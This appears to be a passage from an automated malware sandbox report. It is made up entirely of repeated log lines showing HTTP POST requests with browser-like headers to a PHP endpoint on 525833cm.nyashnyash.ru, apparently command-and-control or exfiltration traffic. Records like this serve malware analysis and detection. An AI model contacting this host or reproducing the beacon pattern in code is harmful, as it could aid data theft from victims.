                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1836Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1856Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 1828Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /providerServerprotectTrafficDlePublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 525833cm.nyashnyash.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
